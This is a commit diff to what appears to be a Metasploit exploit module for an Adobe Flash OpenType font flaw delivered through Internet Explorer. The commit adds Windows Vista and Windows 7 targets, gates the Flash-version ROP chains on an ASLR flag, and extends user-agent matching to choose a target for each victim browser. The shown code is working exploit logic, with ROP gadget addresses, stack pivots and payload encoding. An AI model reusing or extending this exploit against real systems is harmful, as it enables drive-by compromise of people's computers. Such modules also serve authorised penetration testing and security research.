added windows vista and w7 targets

Author: jvazquez-r7

modules/exploits/windows/browser/adobe_flash_otf_font.rb

@@ -68,7 +68,21 @@ def initialize(info={})
 					[
 						'IE 8 on Windows XP SP3',
 						{
-							'Rop' => true
+							'Rop'  => true,
+							'ASLR' => false
+						}
+					],
+					[
+						'IE 7 on Windows Vista',
+						{
+							'Rop'    => nil
+						}
+					],
+					[
+						'IE 8 on Windows 7 SP1',
+						{
+							'Rop'    => true,
+							'ASLR'   => true
 						}
 					]
 				],
@@ -96,7 +110,7 @@ def get_payload(t, flash_version=nil)
 
 			p << payload.encoded
 		else
-			if datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,257/
+			if t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,257/
 
 				print_status("Using Rop Chain For Flash: #{flash_version}")
 				stack_pivot = [
@@ -125,7 +139,7 @@ def get_payload(t, flash_version=nil)
 					0x1060e809, # PUSHAD # RETN (Flash32_11_3_300_257.ocx)
 				].pack("V*")
 
-			elsif datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,265/
+			elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,265/
 
 				print_status("Using Rop Chain For Flash: #{flash_version}")
 				stack_pivot = [
@@ -154,7 +168,7 @@ def get_payload(t, flash_version=nil)
 					0x1062800f, # PUSHAD # RETN (Flash32_11_3_300_265.ocx)
 				].pack("V*")
 
-			elsif datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,268/
+			elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,268/
 
 				print_status("Using Rop Chain For Flash: #{flash_version}")
 				stack_pivot = [
@@ -228,6 +242,10 @@ def get_target(agent)
 			return targets[2]  #IE 7 on Windows XP SP3
 		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
 			return targets[3]  #IE 8 on Windows XP SP3
+		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
+			return targets[4]  #IE 7 on Windows Vista
+		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
+			return targets[5]  #IE 8 on Windows 7
 		else
 			return nil
 		end